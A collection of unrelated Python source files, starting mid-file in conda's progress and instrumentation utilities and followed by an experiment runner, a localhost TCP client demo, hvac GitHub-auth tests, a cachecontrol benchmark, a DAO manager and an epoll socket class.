                self.fh.write(next(self.spinner_cycle) + ' ')
                self.fh.flush()
                sleep(0.10)
                self.fh.write('\b' * self._indicator_length)
        except EnvironmentError as e:
            # Downstream closed the stream: stop quietly, else re-raise.
            if e.errno in (EPIPE, ESHUTDOWN):
                self.stop()
            else:
                raise
    @swallow_broken_pipe
    def __enter__(self):
        if not self.json:
            sys.stdout.write("%s: " % self.message)
            sys.stdout.flush()
        self.start()
    def __exit__(self, exc_type, exc_val, exc_tb):
        self.stop()
        if not self.json:
            with swallow_broken_pipe:
                if exc_type or exc_val:
                    sys.stdout.write("failed\n")
                else:
                    sys.stdout.write("done\n")
            sys.stdout.flush()
class ProgressBar(object):
    def __init__(self, description, enabled=True, json=False):
        """
        Args:
            description (str):
                The name of the progress bar, shown on left side of output.
            enabled (bool):
                If False, usage is a no-op.
            json (bool):
                If true, outputs json progress to stdout rather than a progress bar.
                Currently, the json format assumes this is only used for "fetch", which
                maintains backward compatibility with conda 4.3 and earlier behavior.
        """
        self.description = description
        self.enabled = enabled
        self.json = json
        # json mode needs no tqdm bar; plain mode builds one scaled 0..1.
        if json:
            pass
        elif enabled:
            bar_format = "{desc}{bar} | {percentage:3.0f}% "
            try:
                self.pbar = tqdm(desc=description, bar_format=bar_format, ascii=True, total=1,
                                 file=sys.stdout)
            except EnvironmentError as e:
                # Output already closed downstream: degrade to a no-op.
                if e.errno in (EPIPE, ESHUTDOWN):
                    self.enabled = False
                else:
                    raise
    def update_to(self, fraction):
        # *fraction* is absolute progress in [0, 1]; tqdm wants a delta.
        try:
            if self.json and self.enabled:
                sys.stdout.write('{"fetch":"%s","finished":false,"maxval":1,"progress":%f}\n\0'
                                 % (self.description, fraction))
            elif self.enabled:
                self.pbar.update(fraction - self.pbar.n)
        except EnvironmentError as e:
            if e.errno in (EPIPE, ESHUTDOWN):
                self.enabled = False
            else:
                raise
    def finish(self):
        self.update_to(1)
    @swallow_broken_pipe
    def close(self):
        # Emit the terminal "finished" record (json) or close the tqdm bar.
        if self.enabled and self.json:
            sys.stdout.write('{"fetch":"%s","finished":true,"maxval":1,"progress":1}\n\0'
                             % self.description)
            sys.stdout.flush()
        elif self.enabled:
            self.pbar.close()
# use this for debugging, because ProcessPoolExecutor isn't pdb/ipdb friendly
class DummyExecutor(Executor):
    """Synchronous Executor: submit() runs the callable immediately on the
    calling thread.  Useful for debugging, because ProcessPoolExecutor isn't
    pdb/ipdb friendly."""

    def __init__(self):
        self._shutdown = False
        self._shutdownLock = Lock()

    def submit(self, fn, *args, **kwargs):
        with self._shutdownLock:
            if self._shutdown:
                raise RuntimeError('cannot schedule new futures after shutdown')
            future = Future()
            try:
                # Execute inline; the Future is already resolved on return.
                future.set_result(fn(*args, **kwargs))
            except BaseException as exc:
                future.set_exception(exc)
            return future

    def shutdown(self, wait=True):
        with self._shutdownLock:
            self._shutdown = True
class ThreadLimitedThreadPoolExecutor(ThreadPoolExecutor):
    def __init__(self, max_workers=10):
        super(ThreadLimitedThreadPoolExecutor, self).__init__(max_workers)
    def submit(self, fn, *args, **kwargs):
        """
        This is an exact reimplementation of the `submit()` method on the parent class, except
        with an added `try/except` around `self._adjust_thread_count()`. So long as there is at
        least one living thread, this thread pool will not throw an exception if threads cannot
        be expanded to `max_workers`.

        In the implementation, we use "protected" attributes from concurrent.futures (`_base`
        and `_WorkItem`). Consider vendoring the whole concurrent.futures library
        as an alternative to these protected imports.

        NOTE(review): tracks CPython 3.6's submit(); re-verify against the
        stdlib internals on every interpreter upgrade.

        https://github.com/agronholm/pythonfutures/blob/3.2.0/concurrent/futures/thread.py#L121-L131 # NOQA
        https://github.com/python/cpython/blob/v3.6.4/Lib/concurrent/futures/thread.py#L114-L124
        """
        with self._shutdown_lock:
            if self._shutdown:
                raise RuntimeError('cannot schedule new futures after shutdown')
            f = _base.Future()
            w = _WorkItem(f, fn, args, kwargs)
            self._work_queue.put(w)
            try:
                self._adjust_thread_count()
            except RuntimeError:
                # RuntimeError: can't start new thread
                # See https://github.com/conda/conda/issues/6624
                if len(self._threads) > 0:
                    # It's ok to not be able to start new threads if we already have at least
                    # one thread alive.
                    pass
                else:
                    raise
        return f
    # Re-export for convenient `executor.as_completed(...)` access.
    as_completed = as_completed
def get_instrumentation_record_file():
    """Return the expanded path of the CSV file that records timing data.

    Honors the CONDA_INSTRUMENTATION_RECORD_FILE environment variable;
    defaults to ~/.conda/instrumentation-record.csv.
    """
    record_path = os.environ.get("CONDA_INSTRUMENTATION_RECORD_FILE")
    if record_path is None:
        record_path = join('~', '.conda', 'instrumentation-record.csv')
    return expand(record_path)
class time_recorder(ContextDecorator):  # pragma: no cover
    """Record wall-clock duration of functions/blocks into a CSV file.

    Usable as a decorator (via ContextDecorator) or as a `with` block.
    Timing only happens when the CONDA_INSTRUMENTATION_ENABLED environment
    variable is set to a truthy value.
    """

    # CSV sink: one "entry_name,seconds" line appended per timed call.
    record_file = get_instrumentation_record_file()
    # Set in __enter__ only when instrumentation is enabled; None = disabled.
    start_time = None
    # Class-wide aggregates shared by all instances, keyed by entry name.
    total_call_num = defaultdict(int)
    total_run_time = defaultdict(float)

    def __init__(self, entry_name=None, module_name=None):
        # entry_name may be None; it is then derived from the wrapped
        # function in __call__ via _set_entry_name.
        self.entry_name = entry_name
        self.module_name = module_name

    def _set_entry_name(self, f):
        # Derive a qualified entry name from the wrapped callable when the
        # caller did not supply one explicitly.
        if self.entry_name is None:
            if hasattr(f, '__qualname__'):
                entry_name = f.__qualname__
            else:
                entry_name = ':' + f.__name__
            if self.module_name:
                entry_name = '.'.join((self.module_name, entry_name))
            self.entry_name = entry_name

    def __call__(self, f):
        """Decorator entry point: pick a name, then defer to ContextDecorator."""
        self._set_entry_name(f)
        return super(time_recorder, self).__call__(f)

    def __enter__(self):
        enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
        if enabled and boolify(enabled):
            self.start_time = time()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # start_time is truthy only when instrumentation was enabled on entry.
        if self.start_time:
            entry_name = self.entry_name
            end_time = time()
            run_time = end_time - self.start_time
            self.total_call_num[entry_name] += 1
            self.total_run_time[entry_name] += run_time
            self._ensure_dir()
            with open(self.record_file, 'a') as fh:
                fh.write("%s,%f\n" % (entry_name, run_time))
            # total_call_num = self.total_call_num[entry_name]
            # total_run_time = self.total_run_time[entry_name]
            # log.debug('%s %9.3f %9.3f %d', entry_name, run_time, total_run_time, total_call_num)

    @classmethod
    def log_totals(cls):
        """Log aggregated totals per entry; no-op unless instrumentation is on."""
        enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
        if not (enabled and boolify(enabled)):
            return
        log.info('=== time_recorder total time and calls ===')
        for entry_name in sorted(cls.total_run_time.keys()):
            log.info(
                'TOTAL %9.3f % 9d %s',
                cls.total_run_time[entry_name],
                cls.total_call_num[entry_name],
                entry_name,
            )

    @memoizemethod
    def _ensure_dir(self):
        # Create the record file's parent directory (memoized per instance).
        if not isdir(dirname(self.record_file)):
            os.makedirs(dirname(self.record_file))
def print_instrumentation_data():  # pragma: no cover
    """Aggregate the instrumentation CSV and print per-entry stats as JSON.

    Silently returns when no record file exists yet.
    """
    record_file = get_instrumentation_record_file()
    if not isfile(record_file):
        return
    grouped_data = defaultdict(list)
    with open(record_file) as fh:
        for line in fh:
            name, duration = line.strip().split(',')
            grouped_data[name].append(float(duration))
    final_data = {}
    for name in sorted(grouped_data):
        samples = grouped_data[name]
        total = sum(samples)
        final_data[name] = {
            'counts': len(samples),
            'total_time': total,
            'average_time': total / len(samples),
        }
    print(json.dumps(final_data, sort_keys=True, indent=2, separators=(',', ': ')))
# Allow running this module directly to dump collected instrumentation stats.
if __name__ == "__main__":
    print_instrumentation_data()
|
run_expr.py | #!/usr/bin/env python
import argparse
import datetime as dt
import os
import shutil
import threading
import subprocess32 as subprocess
import time
# Timeout in seconds to run the simulation
RUN_TIMEOUT = 60
class Trial:
    """One experiment trial: a named trajectory plus its parameter file.

    Attributes (read by run_one): tname, descpath, params_file.
    """

    def __init__(self, tname, desc_path, params_file):
        self.tname = tname
        self.descpath = desc_path
        self.params_file = params_file

    def __repr__(self):
        # The trial is identified by its trajectory name alone.
        return self.tname
def assert_exists(path, isfile=False, isdir=False, msg=None):
    """Exit(1) with a diagnostic unless `path` exists (and matches isfile/isdir).

    msg, when given, replaces the default diagnostic prefix.
    (Python 2 print statements, matching the rest of this script.)
    """
    if os.path.exists(path):
        if isdir and not os.path.isdir(path):
            if msg is None:
                print path + ' must be a directory'
            else:
                print msg + ': ' + path
            exit(1)
        if isfile and not os.path.isfile(path):
            if msg is None:
                print path + ' must be a file'
            else:
                print msg + ': ' + path
            exit(1)
    else:
        if msg is None:
            print path + ' doesn\'t exist'
        else:
            print msg + ': ' + path
        exit(1)
def get_experiment_trajectories(expr_dir, params_file):
    """Build a {name: Trial} map from the .pickle files found in expr_dir."""
    trials = {}
    for entry in os.listdir(expr_dir):
        stem, ext = os.path.splitext(entry)
        if ext != ".pickle":
            continue
        trials[stem] = Trial(stem, os.path.join(expr_dir, entry), params_file)
    return trials
def cleanup(proc):
    """Wait for `proc` to finish, killing it if the wait times out.

    NOTE(review): wait() below is currently called without a timeout, so the
    TimeoutExpired branch only fires if the commented timeout is reinstated.
    """
    try:
        ret = proc.wait()  # timeout=600)
    except subprocess.TimeoutExpired:
        print "Timed out"
        proc.kill()
        ret = proc.wait(timeout=3)
    print "--- exit: {}".format(ret)
def run_one(trial_dir, n, trial):
    """Run simulation trial `n` for `trial` in a subdirectory of trial_dir.

    Spawns src/run_once.py as a subprocess and waits for it via cleanup().
    """
    simtimeout = 20.0
    trial_dir = os.path.join(trial_dir, str(n))
    try:
        os.makedirs(trial_dir)
    except OSError:
        # Directory already exists or cannot be created; skip this trial.
        print 'Error making trial dir'
        return

    def tfile(x):
        # Path of file `x` inside this trial's directory.
        return os.path.join(trial_dir, x)

    print "== Trial: {}, N: {}".format(trial_dir, n)
    # start rosbag
    proc = subprocess.Popen(['python', 'src/run_once.py',
                             trial.descpath,
                             tfile("out.pickle"),
                             trial.params_file,
                             "--sim_timeout", str(simtimeout)])
    time.sleep(2.0)
    cleanup(proc)
def ensurethreads(threads, max_threads):
    """Block until at most `max_threads` entries of `threads` are still alive.

    Finished threads are joined and removed from the list in place.

    Bug fixes vs. the original:
    - `del threads[i]` while iterating `range(len(threads))` could raise
      IndexError once deletions shifted the list;
    - an unconditional `return` inside the while loop meant the function
      returned after a single pass and never actually waited.
    """
    while len(threads) > max_threads:
        # Iterate a snapshot because we mutate `threads` inside the loop.
        for t in list(threads):
            if not t.is_alive():
                t.join()
                threads.remove(t)
        if len(threads) > max_threads:
            # Still over the limit: yield briefly instead of busy-spinning.
            time.sleep(0.05)
def run_experiments(nthreads, expr_dir, expr_name, params_file, out_dir):
    """Run ntrial repetitions of each trajectory, at most nthreads at a time.

    Copies the experiment inputs and parameter file into out_dir for
    provenance before launching trials.
    NOTE(review): `expr_name` is accepted but never used in this body, and
    `tlock` is only ever taken by this (main) thread.
    """
    trajs = get_experiment_trajectories(expr_dir, params_file)
    ntrial = 10
    total = ntrial * len(trajs.items())
    j = 0
    shutil.copytree(expr_dir, out_dir)
    shutil.copyfile(params_file, out_dir + "/params.yaml")
    threads = []
    tlock = threading.Lock()
    for trajname, traj in trajs.items():
        exp_dir = os.path.join(out_dir, trajname)
        os.makedirs(exp_dir)
        trial_dir = os.path.join(exp_dir, trajname)
        os.makedirs(trial_dir)
        # NOTE(review): duplicate recomputation of trial_dir (same value).
        trial_dir = os.path.join(exp_dir, trajname)
        for i in range(ntrial):
            with tlock:
                # Cull finished threads to keep at most nthreads running.
                ensurethreads(threads, nthreads)
            t = threading.Thread(target=run_one, args=(trial_dir, i, traj))
            t.start()
            threads.append(t)
            time.sleep(0.5)
            j += 1
            print "Trial %d of %d" % (j, total)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Runs a test suite for mushr_rhc')
    parser.add_argument('expr_dir',
                        help='Directory to read and run experiments from')
    parser.add_argument('out_dir',
                        help='Directory to output expermiment data to')
    parser.add_argument('params_file',
                        help='Parameter file for the RHC')
    parser.add_argument('--expr-name',
                        nargs='+',
                        default='all',
                        help='Experiment to run')
    parser.add_argument('--real',
                        action='store_true',
                        help='Run experiments in real')
    parser.add_argument('--prompt-comments',
                        action='store_true',
                        help='Prompt for comment on the run after every run')
    # parse_known_args tolerates extra arguments injected by ROS.
    args, _ = parser.parse_known_args()
    # Ignore ros specific parameters
    args.expr_name = list(filter(lambda x: '__' not in x, args.expr_name))
    assert_exists(args.expr_dir, isdir=True)
    if os.path.exists(args.out_dir):
        # Archive any pre-existing output directory with a timestamp suffix.
        t = str(dt.datetime.now()).replace(' ', '-')
        print args.out_dir, args.out_dir + '-' + t
        os.rename(args.out_dir, args.out_dir + '-' + t)
    run_experiments(1, args.expr_dir, args.expr_name, args.params_file, args.out_dir)
|
client_demo.py | import socket
import struct
import threading
import queue
import time
class ThreadedClient(threading.Thread):
    """Demo TCP client: queues outbound messages, polls the socket for inbound.

    NOTE(review): run() is not overridden, so start() launches a thread that
    does nothing; the real work happens in start_listen()/listen().
    """

    def __init__(self, host, port):
        """Connect to (host, port) and prepare the outbound message queue."""
        threading.Thread.__init__(self)
        # set up queues
        self.send_q = queue.Queue(maxsize = 10)
        # declare instance variables
        self.host = host
        self.port = port
        # connect to socket; the short timeout turns recv() into a poll.
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.connect((self.host, self.port))
        self.s.settimeout(.1)

    # LISTEN
    def listen(self):
        """Poll forever: flush one queued outbound message, then try to recv."""
        while True:  # loop forever
            try:
                print('checking for message...')
                # stops listening if there's a message to send
                if self.send_q.empty() == False:
                    self.send_message()
                else:
                    print('no message')
                print('listening...')
                message = self.s.recv(4096).decode()
                print('RECEIVED: ' + message)
            except socket.timeout:
                # recv timed out (0.1s) — loop back and check the queue again.
                pass

    def start_listen(self):
        """Run listen() on its own thread so the caller is not blocked."""
        t = threading.Thread(target = self.listen)
        t.start()
        # t.join()
        print('started listen')

    # ADD MESSAGE
    def add_message(self, msg):
        """Queue `msg` for sending; listen() drains the queue."""
        # put message into the send queue
        self.send_q.put(msg)
        print('ADDED MSG: ' + msg)
        # self.send_message()

    # SEND MESSAGE
    def send_message(self):
        """Pop one message from the queue and send it, if any."""
        # send message
        msg = self.get_send_q()
        if msg == "empty!":
            print("nothing to send")
        else:
            self.s.sendall(msg.encode())
            print('SENDING: ' + msg)
        # restart the listening
        # self.start_listen()

    # SAFE QUEUE READING
    # if nothing in q, returns the sentinel "empty!" instead of blocking
    def get_send_q(self):
        """Non-blocking queue read; returns the string "empty!" when empty.

        NOTE(review): a real message "empty!" is indistinguishable from the
        sentinel.
        """
        if self.send_q.empty():
            print("empty!")
            return "empty!"
        else:
            msg = self.send_q.get()
            return msg
# Demo driver: connect, queue a message, start polling, queue another.
if __name__ == '__main__':
    port = 8001
    address = 'localhost'
    s = ThreadedClient(address, port)
    # NOTE(review): run() is not overridden, so start() launches a no-op thread.
    s.start()
    print(('Server started, port: ', port))
    s.add_message('hello world')
    s.start_listen()
    s.add_message('hello world')
test_github.py | from threading import Thread
from unittest import TestCase
from parameterized import parameterized
from hvac import exceptions
from hvac.tests import utils
try:
    # Python 3.x
    from http.server import HTTPServer
except ImportError:
    # Python 2.7
    from BaseHTTPServer import HTTPServer
class TestGithub(utils.HvacIntegrationTestCase, TestCase):
    """Integration tests for the GitHub auth method against a mocked GitHub API."""

    TEST_GITHUB_PATH = 'test-github'

    @classmethod
    def setUpClass(cls):
        """Start a mock GitHub HTTP server on a free port, in a daemon thread."""
        super(TestGithub, cls).setUpClass()
        # Configure mock server.
        cls.mock_server_port = utils.get_free_port()
        cls.mock_server = HTTPServer(('localhost', cls.mock_server_port), utils.MockGithubRequestHandler)
        # Start running mock server in a separate thread.
        # Daemon threads automatically shut down when the main process exits.
        cls.mock_server_thread = Thread(target=cls.mock_server.serve_forever)
        # `daemon` attribute instead of the deprecated setDaemon().
        cls.mock_server_thread.daemon = True
        cls.mock_server_thread.start()

    def setUp(self):
        """Enable a dedicated github auth mount before each test."""
        super(TestGithub, self).setUp()
        self.client.sys.enable_auth_method(
            method_type='github',
            path=self.TEST_GITHUB_PATH,
        )

    def tearDown(self):
        """Disable the github auth mount after each test."""
        super(TestGithub, self).tearDown()
        self.client.sys.disable_auth_method(
            path=self.TEST_GITHUB_PATH,
        )

    @parameterized.expand([
        ("just organization", 204, 'some-test-org', '', 0, 0, TEST_GITHUB_PATH),
    ])
    def test_configure(self, test_label, expected_status_code, organization, base_url, ttl, max_ttl, mount_point):
        """Configuring the backend returns the expected status code."""
        response = self.client.auth.github.configure(
            organization=organization,
            base_url=base_url,
            ttl=ttl,
            max_ttl=max_ttl,
            mount_point=mount_point,
        )
        self.assertEqual(
            first=expected_status_code,
            second=response.status_code
        )

    def test_read_configuration(self):
        """Reading the configuration returns a 'data' payload."""
        response = self.client.auth.github.read_configuration(
            mount_point=self.TEST_GITHUB_PATH,
        )
        self.assertIn(
            member='data',
            container=response,
        )

    @parameterized.expand([
        ("just organization", 'some-test-org', '', '', ''),
        ("different base url", 'some-test-org', 'https://cathub.example', '', ''),
        ("custom ttl seconds", 'some-test-org', '', '500s', ''),
        ("custom ttl minutes", 'some-test-org', '', '500m', ''),
        ("custom ttl hours", 'some-test-org', '', '500h', ''),
        ("custom max ttl", 'some-test-org', '', '', '500s'),
    ])
    def test_configure_and_read_configuration(self, test_label, organization, base_url, ttl, max_ttl):
        """Round-trip: written configuration values are read back unchanged."""
        config_response = self.client.auth.github.configure(
            organization=organization,
            base_url=base_url,
            ttl=ttl,
            max_ttl=max_ttl,
            mount_point=self.TEST_GITHUB_PATH,
        )
        self.assertEqual(
            first=204,
            second=config_response.status_code
        )
        read_config_response = self.client.auth.github.read_configuration(
            mount_point=self.TEST_GITHUB_PATH,
        )
        self.assertEqual(
            first=organization,
            second=read_config_response['data']['organization']
        )
        self.assertEqual(
            first=base_url,
            second=read_config_response['data']['base_url']
        )
        self.assertEqual(
            first=self.convert_python_ttl_value_to_expected_vault_response(ttl_value=ttl),
            second=read_config_response['data']['ttl']
        )
        self.assertEqual(
            first=self.convert_python_ttl_value_to_expected_vault_response(ttl_value=max_ttl),
            second=read_config_response['data']['max_ttl']
        )

    @parameterized.expand([
        ("no policies", 204, 'hvac', None),
        ("with policies", 204, 'hvac', ['default']),
    ])
    def test_map_team(self, test_label, expected_status_code, team_name, policies):
        """Mapping a team to policies returns the expected status code."""
        response = self.client.auth.github.map_team(
            team_name=team_name,
            policies=policies,
            mount_point=self.TEST_GITHUB_PATH,
        )
        self.assertEqual(
            first=expected_status_code,
            second=response.status_code
        )

    def test_read_team_mapping(self):
        """Reading a team mapping returns a 'data' payload."""
        response = self.client.auth.github.read_team_mapping(
            team_name='hvac',
            mount_point=self.TEST_GITHUB_PATH,
        )
        self.assertIn(
            member='data',
            container=response,
        )

    @parameterized.expand([
        ("no policies", 204, 'hvac', None),
        ("with policy", 204, 'hvac', ['default']),
        ("with policy incorrect type", 204, 'hvac', 'default, root', exceptions.ParamValidationError, "unsupported policies argument provided"),
        ("with policies", 204, 'hvac', ['default', 'root']),
    ])
    def test_map_team_and_read_mapping(self, test_label, expected_status_code, team_name, policies, raises=False, exception_msg=''):
        """Round-trip team mapping; invalid `policies` types raise ParamValidationError."""
        if raises:
            with self.assertRaises(raises) as cm:
                self.client.auth.github.map_team(
                    team_name=team_name,
                    policies=policies,
                    mount_point=self.TEST_GITHUB_PATH,
                )
            self.assertIn(
                member=exception_msg,
                container=str(cm.exception),
            )
        else:
            response = self.client.auth.github.map_team(
                team_name=team_name,
                policies=policies,
                mount_point=self.TEST_GITHUB_PATH,
            )
            self.assertEqual(
                first=expected_status_code,
                second=response.status_code
            )
            response = self.client.auth.github.read_team_mapping(
                team_name=team_name,
                mount_point=self.TEST_GITHUB_PATH,
            )
            if policies is None:
                expected_policies = ''
            else:
                expected_policies = ','.join(policies)
            self.assertDictEqual(
                d1=dict(key=team_name, value=expected_policies),
                d2=response['data'],
            )

    @parameterized.expand([
        ("no policies", 204, 'hvac-user', None),
        ("with policies", 204, 'hvac-user', ['default']),
    ])
    def test_map_user(self, test_label, expected_status_code, user_name, policies):
        """Mapping a user to policies returns the expected status code.

        Bug fix: this method was named `teat_map_user`, so the unittest
        runner never discovered or executed it.
        """
        response = self.client.auth.github.map_user(
            user_name=user_name,
            policies=policies,
            mount_point=self.TEST_GITHUB_PATH,
        )
        self.assertEqual(
            first=expected_status_code,
            second=response.status_code
        )

    def test_read_user_mapping(self):
        """Reading a user mapping returns a 'data' payload."""
        response = self.client.auth.github.read_user_mapping(
            user_name='hvac',
            mount_point=self.TEST_GITHUB_PATH,
        )
        self.assertIn(
            member='data',
            container=response,
        )

    @parameterized.expand([
        ("no policies", 204, 'hvac', None),
        ("with policy", 204, 'hvac', ['default']),
        ("with policy incorrect type", 204, 'hvac', 'default, root', exceptions.ParamValidationError, "unsupported policies argument provided"),
        ("with policies", 204, 'hvac', ['default', 'root']),
    ])
    def test_map_user_and_read_mapping(self, test_label, expected_status_code, user_name, policies, raises=False, exception_msg=''):
        """Round-trip user mapping; invalid `policies` types raise ParamValidationError."""
        if raises:
            with self.assertRaises(raises) as cm:
                self.client.auth.github.map_user(
                    user_name=user_name,
                    policies=policies,
                    mount_point=self.TEST_GITHUB_PATH,
                )
            self.assertIn(
                member=exception_msg,
                container=str(cm.exception),
            )
        else:
            response = self.client.auth.github.map_user(
                user_name=user_name,
                policies=policies,
                mount_point=self.TEST_GITHUB_PATH,
            )
            self.assertEqual(
                first=expected_status_code,
                second=response.status_code
            )
            response = self.client.auth.github.read_user_mapping(
                user_name=user_name,
                mount_point=self.TEST_GITHUB_PATH,
            )
            if policies is None:
                expected_policies = ''
            else:
                expected_policies = ','.join(policies)
            self.assertDictEqual(
                d1=dict(key=user_name, value=expected_policies),
                d2=response['data'],
            )

    @parameterized.expand([
        ("valid token", 'valid-token', None, None),
        ("invalid token not in org", "invalid-token", exceptions.InvalidRequest, 'user is not part of required org'),
    ])
    def test_login(self, test_label, test_token, exceptions_raised, exception_msg):
        """Login succeeds with a valid token; invalid tokens raise InvalidRequest."""
        self.client.auth.github.configure(
            organization='hvac',
            base_url='http://localhost:{port}/'.format(port=self.mock_server_port),
            mount_point=self.TEST_GITHUB_PATH,
        )
        if exceptions_raised is None:
            self.client.auth.github.login(
                token=test_token,
                mount_point=self.TEST_GITHUB_PATH,
            )
        else:
            with self.assertRaises(exceptions_raised) as cm:
                self.client.auth.github.login(
                    token=test_token,
                    mount_point=self.TEST_GITHUB_PATH,
                )
            self.assertIn(
                member=exception_msg,
                container=str(cm.exception)
            )
|
benchmark.py | # SPDX-FileCopyrightText: 2015 Eric Larson
#
# SPDX-License-Identifier: Apache-2.0
import sys
import requests
import argparse
from multiprocessing import Process
from datetime import datetime
from wsgiref.simple_server import make_server
from cachecontrol import CacheControl
HOST = "localhost"
PORT = 8050
URL = "http://{}:{}/".format(HOST, PORT)
class Server(object):
    """Minimal WSGI app serving a cacheable plain-text "Hello World!" response."""

    def __call__(self, env, sr):
        """WSGI entry point: emit 200 OK with a 10-minute Cache-Control header.

        Bug fix: PEP 3333 requires the response body to be an iterable of
        *bytes*; the original returned a str, which wsgiref rejects on
        Python 3 (and would be iterated per-character on Python 2).
        """
        status = "200 OK"
        headers = [
            ("Cache-Control", "max-age=%i" % (60 * 10)), ("Content-Type", "text/plain")
        ]
        sr(status, headers)
        return [b"Hello World!"]
def start_server():
    """Serve the benchmark WSGI app on HOST:PORT forever (blocking call)."""
    httpd = make_server(HOST, PORT, Server())
    httpd.serve_forever()
def run_benchmark(sess):
    """Time 1000 sequential GETs against a local WSGI server using `sess`.

    NOTE(review): the server process is started without waiting for it to
    bind, so the first request can race server startup; terminate() is also
    not followed by join().
    """
    proc = Process(target=start_server)
    proc.start()
    start = datetime.now()
    for i in range(0, 1000):
        sess.get(URL)
        sys.stdout.write(".")
    end = datetime.now()
    print()
    total = end - start
    print("Total time for 1000 requests: %s" % total)
    proc.terminate()
def run():
    """CLI entry point: benchmark 1000 GETs, with or without cachecontrol."""
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-n",
        "--no-cache",
        default=False,
        action="store_true",
        help="Do not use cachecontrol",
    )
    opts = parser.parse_args()
    base_session = requests.Session()
    # Wrap the session with the caching adapter unless disabled on the CLI.
    session = base_session if opts.no_cache else CacheControl(base_session)
    run_benchmark(session)
# Script entry point.
if __name__ == "__main__":
    run()
|
daomanager.py | """
Data Access Object Manager.
The DAO manager coordinates the DAOs from each one of the necessary sources to
generate the dataframe used by the classifiers to calculate a prediction score.
"""
from typing import Generator
import pandas as pd
import geniepy.datamgmt.daos as daos
from multiprocessing import Process
import geniepy.config as config
import geniepy.datamgmt.tables as gt
import geniepy.datamgmt.repositories as dr
class DaoManager:
    """
    Implementation of Data Access Object Manager.
    The DAO manager is intended to utilize different DAOs to generate
    dataframe records used by the classifiers.
    At start of day the download method should be called to scrape data from online
    sources on each DAO and generate appropriate tables.
    The DAO manager should then be called to generate the records that can be fed into
    the classifiers.
    """

    __slots__ = [
        "_sjr_dao",
        "_pubtator_disease_dao",
        "_pubtator_gene_dao",
        "_pubmed_dao",
        "_features",
        "_scores",
    ]

    def create_repos(self):
        """Configure and create scoring repositories (features and scores)."""
        credentials = config.get_credentials()
        projname = config.get_projname()
        dataset = config.get_dataset("scoring")
        features_repo = dr.GbqRepository(
            projname, gt.FEATURES_PROPTY, dataset, credentials
        )
        scores_repo = dr.GbqRepository(projname, gt.SCORES_PROPTY, dataset, credentials)
        return features_repo, scores_repo

    # pylint: disable=bad-continuation
    def __init__(
        self,
        sjr_dao: daos.SjrDao,
        pubtator_disease_dao: daos.PubtatorDiseaseParser,
        pubtator_gene_dao: daos.PubtatorGeneParser,
        pubmed_dao: daos.PubMedDao,
    ):
        """Initialize DAO mgr with corresponding DAO children."""
        self._sjr_dao = sjr_dao
        self._pubtator_disease_dao = pubtator_disease_dao
        self._pubtator_gene_dao = pubtator_gene_dao
        self._pubmed_dao = pubmed_dao
        self._features, self._scores = self.create_repos()

    def download(self, chunksize: int, **kwargs):
        """Download (scrapes) data for DAOs and creates internal tables.

        The scrapers run in separate processes and are intentionally
        fire-and-forget (not joined here).
        """
        # Fire off scrapers async
        psjr = Process(target=self._sjr_dao.download, args=(chunksize,), kwargs=kwargs)
        ppubtatordisease = Process(
            target=self._pubtator_disease_dao.download, args=(chunksize,), kwargs=kwargs
        )
        ppubtatorgene = Process(
            target=self._pubtator_gene_dao.download, args=(chunksize,), kwargs=kwargs
        )
        ppubmed = Process(
            target=self._pubmed_dao.download, args=(chunksize,), kwargs=kwargs
        )
        psjr.start()
        ppubtatordisease.start()
        ppubtatorgene.start()
        ppubmed.start()

    def _get_pubmeds_df(self, pmids: str):
        """
        Get pubmed dao dataframes.
        Arguments:
            pmids {str} -- pipe delimited string with pmids
        Returns: Dataframe with pubmed dao dataframe.
        """
        pmid_list = pmids.split("|")
        frames = []
        for pmid in pmid_list:
            try:
                pmid_query = self._pubmed_dao.query_pkey(int(pmid))
                # Only care about 1 pmid entry (table shouldn't have duplicates)
                frames.append(next(self._pubmed_dao.query(pmid_query, 1)))
            except StopIteration:  # pragma: no cover
                # TODO log instead of print
                print(f"PMID: {pmid} not found!")
        # Bug fix: DataFrame.append was removed in pandas 2.0; build the
        # result with a single concat instead of appending per pmid.
        if not frames:
            return pd.DataFrame()
        return pd.concat(frames, ignore_index=True)

    def get_max_feature(self, chunksize):
        """Retrieve the max addressable record in features table."""
        count_query = self._features.query_all.replace("*", "MAX(random_num)")
        max_df = next(self._features.query(count_query, 1, exact=True))
        # Make sure go past max to include all numbers in range.
        # .iloc[0, 0] avoids the deprecated chained-indexing .iloc[0][0].
        return int(max_df.iloc[0, 0]) + chunksize

    def get_features(self, offset: int, chunksize: int) -> pd.DataFrame:
        """
        Generate the dataframe records for classifiers.
        This function should be called after the DAO tables have been created through
        the download function.
        Arguments:
            offset {int} -- The offset of records to be fetched
            chunksize {int} -- The number of records to be returned
        Returns:
            A dataframe containing records from features table
        """
        gen_query = (
            lambda offset: self._features.query_all
            + f" WHERE random_num BETWEEN {offset} AND {offset + chunksize};"
        )
        query_str = gen_query(offset)
        print(query_str)
        record_df = next(self._features.query(query_str, chunksize, exact=True))
        return record_df

    def save_predictions(self, predictions: pd.DataFrame):
        """
        Save computed predictions and supporting data into output tables.
        Arguments:
            predictions {DataFrame} -- scored records to persist
        """
        self._scores.save(predictions)
|
rm_socket.py | import traceback
import errno
import queue
import rm_log
import select
import socket
import subprocess
import threading
logger = rm_log.dji_scratch_logger_get()
class RmSocket(object):
    """epoll-driven TCP/UDP socket manager mapping user fds to real sockets."""
    # Mode strings accepted by create().
    TCP_MODE = 'tcp'
    UDP_MODE = 'udp'
    def __init__(self):
        # Maps user-facing fd numbers handed out by this class to OS filenos.
        self.user_fd_to_socket_fd = {}
        # Per-socket bookkeeping keyed by fileno: socket, queues, callbacks...
        self.socket_fileno_info = {}
        # self.recv_msg_queue = queue.Queue(128)
        # NOTE(review): appears unused; sends use the per-socket 'send_msgq'.
        self.send_msg_queue = queue.Queue(128)
        # Next user fd to hand out (incremented before use).
        self.user_fd = 0
        self.epoll_obj = select.epoll()
        # Flag + handle for the background epoll polling thread.
        self.recv_thread_finish = True
        self.recv_thread = None
    def init(self):
        """Start the background epoll polling thread."""
        logger.info('SOCKET INIT')
        self.recv_thread = threading.Thread(target=self.__epoll_task)
        self.recv_thread_finish = False
        self.recv_thread.start()
    def exit(self):
        """Stop the epoll thread and close every managed socket."""
